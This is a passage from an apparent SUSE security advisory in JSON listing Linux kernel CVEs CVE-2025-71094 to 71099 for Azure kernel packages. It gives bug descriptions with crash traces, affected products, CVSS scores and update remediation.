"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: usb: asix: validate PHY address before use\n\nThe ASIX driver reads the PHY address from the USB device via\nasix_read_phy_addr(). A malicious or faulty device can return an\ninvalid address (\u003e= PHY_MAX_ADDR), which causes a warning in\nmdiobus_get_phy():\n\n addr 207 out of range\n WARNING: drivers/net/phy/mdio_bus.c:76\n\nValidate the PHY address in asix_read_phy_addr() and remove the\nnow-redundant check in ax88172a.c.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71094",
"url": "https://www.suse.com/security/cve/CVE-2025-71094"
},
{
"category": "external",
"summary": "SUSE Bug 1256597 for CVE-2025-71094",
"url": "https://bugzilla.suse.com/1256597"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "low"
}
],
"title": "CVE-2025-71094"
},
{
"cve": "CVE-2025-71095",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71095"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: stmmac: fix the crash issue for zero copy XDP_TX action\n\nThere is a crash issue when running zero copy XDP_TX action, the crash\nlog is shown below.\n\n[ 216.122464] Unable to handle kernel paging request at virtual address fffeffff80000000\n[ 216.187524] Internal error: Oops: 0000000096000144 [#1] SMP\n[ 216.301694] Call trace:\n[ 216.304130] dcache_clean_poc+0x20/0x38 (P)\n[ 216.308308] __dma_sync_single_for_device+0x1bc/0x1e0\n[ 216.313351] stmmac_xdp_xmit_xdpf+0x354/0x400\n[ 216.317701] __stmmac_xdp_run_prog+0x164/0x368\n[ 216.322139] stmmac_napi_poll_rxtx+0xba8/0xf00\n[ 216.326576] __napi_poll+0x40/0x218\n[ 216.408054] Kernel panic - not syncing: Oops: Fatal exception in interrupt\n\nFor XDP_TX action, the xdp_buff is converted to xdp_frame by\nxdp_convert_buff_to_frame(). The memory type of the resulting xdp_frame\ndepends on the memory type of the xdp_buff. For page pool based xdp_buff\nit produces xdp_frame with memory type MEM_TYPE_PAGE_POOL. For zero copy\nXSK pool based xdp_buff it produces xdp_frame with memory type\nMEM_TYPE_PAGE_ORDER0. However, stmmac_xdp_xmit_back() does not check the\nmemory type and always uses the page pool type, this leads to invalid\nmappings and causes the crash. Therefore, check the xdp_buff memory type\nin stmmac_xdp_xmit_back() to fix this issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71095",
"url": "https://www.suse.com/security/cve/CVE-2025-71095"
},
{
"category": "external",
"summary": "SUSE Bug 1256605 for CVE-2025-71095",
"url": "https://bugzilla.suse.com/1256605"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71095"
},
{
"cve": "CVE-2025-71096",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71096"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/core: Check for the presence of LS_NLA_TYPE_DGID correctly\n\nThe netlink response for RDMA_NL_LS_OP_IP_RESOLVE should always have a\nLS_NLA_TYPE_DGID attribute, it is invalid if it does not.\n\nUse the nl parsing logic properly and call nla_parse_deprecated() to fill\nthe nlattrs array and then directly index that array to get the data for\nthe DGID. Just fail if it is NULL.\n\nRemove the for loop searching for the nla, and squash the validation and\nparsing into one function.\n\nFixes an uninitialized read from the stack triggered by userspace if it\ndoes not provide the DGID to a kernel initiated RDMA_NL_LS_OP_IP_RESOLVE\nquery.\n\n BUG: KMSAN: uninit-value in hex_byte_pack include/linux/hex.h:13 [inline]\n BUG: KMSAN: uninit-value in ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490\n hex_byte_pack include/linux/hex.h:13 [inline]\n ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490\n ip6_addr_string+0x18a/0x3e0 lib/vsprintf.c:1509\n ip_addr_string+0x245/0xee0 lib/vsprintf.c:1633\n pointer+0xc09/0x1bd0 lib/vsprintf.c:2542\n vsnprintf+0xf8a/0x1bd0 lib/vsprintf.c:2930\n vprintk_store+0x3ae/0x1530 kernel/printk/printk.c:2279\n vprintk_emit+0x307/0xcd0 kernel/printk/printk.c:2426\n vprintk_default+0x3f/0x50 kernel/printk/printk.c:2465\n vprintk+0x36/0x50 kernel/printk/printk_safe.c:82\n _printk+0x17e/0x1b0 kernel/printk/printk.c:2475\n ib_nl_process_good_ip_rsep drivers/infiniband/core/addr.c:128 [inline]\n ib_nl_handle_ip_res_resp+0x963/0x9d0 drivers/infiniband/core/addr.c:141\n rdma_nl_rcv_msg drivers/infiniband/core/netlink.c:-1 [inline]\n rdma_nl_rcv_skb drivers/infiniband/core/netlink.c:239 [inline]\n rdma_nl_rcv+0xefa/0x11c0 drivers/infiniband/core/netlink.c:259\n netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]\n netlink_unicast+0xf04/0x12b0 net/netlink/af_netlink.c:1346\n netlink_sendmsg+0x10b3/0x1250 net/netlink/af_netlink.c:1896\n sock_sendmsg_nosec net/socket.c:714 [inline]\n __sock_sendmsg+0x333/0x3d0 net/socket.c:729\n ____sys_sendmsg+0x7e0/0xd80 net/socket.c:2617\n ___sys_sendmsg+0x271/0x3b0 net/socket.c:2671\n __sys_sendmsg+0x1aa/0x300 net/socket.c:2703\n __compat_sys_sendmsg net/compat.c:346 [inline]\n __do_compat_sys_sendmsg net/compat.c:353 [inline]\n __se_compat_sys_sendmsg net/compat.c:350 [inline]\n __ia32_compat_sys_sendmsg+0xa4/0x100 net/compat.c:350\n ia32_sys_call+0x3f6c/0x4310 arch/x86/include/generated/asm/syscalls_32.h:371\n do_syscall_32_irqs_on arch/x86/entry/syscall_32.c:83 [inline]\n __do_fast_syscall_32+0xb0/0x150 arch/x86/entry/syscall_32.c:306\n do_fast_syscall_32+0x38/0x80 arch/x86/entry/syscall_32.c:331\n do_SYSENTER_32+0x1f/0x30 arch/x86/entry/syscall_32.c:3",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71096",
"url": "https://www.suse.com/security/cve/CVE-2025-71096"
},
{
"category": "external",
"summary": "SUSE Bug 1256606 for CVE-2025-71096",
"url": "https://bugzilla.suse.com/1256606"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71096"
},
{
"cve": "CVE-2025-71097",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71097"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: Fix reference count leak when using error routes with nexthop objects\n\nWhen a nexthop object is deleted, it is marked as dead and then\nfib_table_flush() is called to flush all the routes that are using the\ndead nexthop.\n\nThe current logic in fib_table_flush() is to only flush error routes\n(e.g., blackhole) when it is called as part of network namespace\ndismantle (i.e., with flush_all=true). Therefore, error routes are not\nflushed when their nexthop object is deleted:\n\n # ip link add name dummy1 up type dummy\n # ip nexthop add id 1 dev dummy1\n # ip route add 198.51.100.1/32 nhid 1\n # ip route add blackhole 198.51.100.2/32 nhid 1\n # ip nexthop del id 1\n # ip route show\n blackhole 198.51.100.2 nhid 1 dev dummy1\n\nAs such, they keep holding a reference on the nexthop object which in\nturn holds a reference on the nexthop device, resulting in a reference\ncount leak:\n\n # ip link del dev dummy1\n [ 70.516258] unregister_netdevice: waiting for dummy1 to become free. Usage count = 2\n\nFix by flushing error routes when their nexthop is marked as dead.\n\nIPv6 does not suffer from this problem.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71097",
"url": "https://www.suse.com/security/cve/CVE-2025-71097"
},
{
"category": "external",
"summary": "SUSE Bug 1256607 for CVE-2025-71097",
"url": "https://bugzilla.suse.com/1256607"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71097"
},
{
"cve": "CVE-2025-71098",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71098"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nip6_gre: make ip6gre_header() robust\n\nOver the years, syzbot found many ways to crash the kernel\nin ip6gre_header() [1].\n\nThis involves team or bonding drivers ability to dynamically\nchange their dev-\u003eneeded_headroom and/or dev-\u003ehard_header_len\n\nIn this particular crash mld_newpack() allocated an skb\nwith a too small reserve/headroom, and by the time mld_sendpack()\nwas called, syzbot managed to attach an ip6gre device.\n\n[1]\nskbuff: skb_under_panic: text:ffffffff8a1d69a8 len:136 put:40 head:ffff888059bc7000 data:ffff888059bc6fe8 tail:0x70 end:0x6c0 dev:team0\n------------[ cut here ]------------\n kernel BUG at net/core/skbuff.c:213 !\n \u003cTASK\u003e\n skb_under_panic net/core/skbuff.c:223 [inline]\n skb_push+0xc3/0xe0 net/core/skbuff.c:2641\n ip6gre_header+0xc8/0x790 net/ipv6/ip6_gre.c:1371\n dev_hard_header include/linux/netdevice.h:3436 [inline]\n neigh_connected_output+0x286/0x460 net/core/neighbour.c:1618\n neigh_output include/net/neighbour.h:556 [inline]\n ip6_finish_output2+0xfb3/0x1480 net/ipv6/ip6_output.c:136\n __ip6_finish_output net/ipv6/ip6_output.c:-1 [inline]\n ip6_finish_output+0x234/0x7d0 net/ipv6/ip6_output.c:220\n NF_HOOK_COND include/linux/netfilter.h:307 [inline]\n ip6_output+0x340/0x550 net/ipv6/ip6_output.c:247\n NF_HOOK+0x9e/0x380 include/linux/netfilter.h:318\n mld_sendpack+0x8d4/0xe60 net/ipv6/mcast.c:1855\n mld_send_cr net/ipv6/mcast.c:2154 [inline]\n mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71098",
"url": "https://www.suse.com/security/cve/CVE-2025-71098"
},
{
"category": "external",
"summary": "SUSE Bug 1256591 for CVE-2025-71098",
"url": "https://bugzilla.suse.com/1256591"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71098"
},
{
"cve": "CVE-2025-71099",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71099"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe/oa: Fix potential UAF in xe_oa_add_config_ioctl()\n\nIn xe_oa_add_config_ioctl(), we accessed oa_config-\u003eid after dropping\nmetrics_lock. Since this lock protects the lifetime of oa_config, an\nattacker could guess the id and call xe_oa_remove_config_ioctl() with\nperfect timing, freeing oa_config before we dereference it, leading to\na potential use-after-free.\n\nFix this by caching the id in a local variable while holding the lock.\n\nv2: (Matt A)\n- Dropped mutex_unlock(\u0026oa-\u003emetrics_lock) ordering change from\n xe_oa_remove_config_ioctl()\n\n(cherry picked from commit 28aeaed130e8e587fd1b73b6d66ca41ccc5a1a31)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71099",
"url": "https://www.suse.com/security/cve/CVE-2025-71099"
},
{
"category": "external",
"summary": "SUSE Bug 1256592 for CVE-2025-71099",
"url": "https://bugzilla.suse.com/1256592"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
